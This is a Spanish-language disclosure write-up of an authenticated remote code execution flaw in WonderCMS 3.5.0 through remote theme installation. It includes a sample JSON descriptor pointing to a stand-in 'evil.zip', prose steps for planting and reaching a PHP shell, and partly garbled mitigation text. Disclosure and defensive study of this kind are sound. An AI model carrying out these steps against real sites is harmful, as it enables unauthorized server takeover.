
Exploit de RCE autenticado para WonderCMS 3.5.0 mediante instalación de temas maliciosos. Incluye mecánica de vulnerabilidad, PoC y guía de mitigación para pruebas de seguridad y educación.
Existe una vulnerabilidad de ejecución remota de código (RCE) autenticada en WonderCMS v3.5.0.
El problema surge de cómo la aplicación maneja las instalaciones remotas de temas/módulos mediante descriptores JSON. Cuando un administrador envía un archivo JSON remoto que hace referencia a un archivo ZIP, su contenido se extrae a un directorio accesible desde la web (p. ej., /themes/). Si el ZIP contiene un archivo PHP, ese archivo se vuelve accesible a través de la web y puede ejecutarse.
Este comportamiento introduce riesgo de RCE debido a:
Nota: Se requiere autenticación de administrador, pero las instalaciones predeterminadas exponen la contraseña de administrador públicamente (en la página de inicio), utilizan un inicio de sesión solo con contraseña y no aplican controles de autenticación sólidos.
WonderCMS aceptará e intentará instalar módulos/temas remotos si el descriptor JSON enviado coincide con el formato esperado . Un descriptor que pase la comprobación de formato (y apunte a un archivo ZIP) será recuperado y el contenido de su archivo se extraerá a un directorio accesible desde la web (p. ej., ) sin validación adicional de los tipos de archivo.
wcms-modules.json/themes/<name>/Descriptor de ejemplo:
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
Advertencia: No ejecutar en sistemas de producción. Utilizar únicamente entornos de prueba autorizados.
Obtenga la contraseña de administrador de la página de inicio expuesta públicamente de una instalación predeterminada de WonderCMS.
Inicie sesión en el panel de administración.
Navegue hasta la sección de instalación de temas.
Proporcione la URL de un descriptor JSON malicioso (p. ej., alojado en un servidor controlado por el atacante).
Inicie la instalación. El servidor hará lo siguiente:
Instale el tema malicioso descargado.
Acceda al shell PHP extraído (p. ej., http://target.com/themes/<Theme_Name>/shell.php) para ejecutar comandos arbitrarios.
(Nota: Realice estos pasos únicamente en un entorno de prueba controlado. Explotar esta vulnerabilidad en sistemas en producción sin autorización es ilegal).
La vulnerabilidad se informó a los mantenedores de WonderCMS en julio de 2025.
Los mantenedores reconocieron el informe pero señalaron que, en su opinión, este comportamiento es aceptable para los administradores.
Para reducir la exposición:
themes/ o plugins/ mediante la configuración del servidor.Esta información se proporciona con fines defensivos de investigación en seguridad y educativos. Obtenga siempre la autorización adecuada antes de probar o divulgar vulnerabilidades.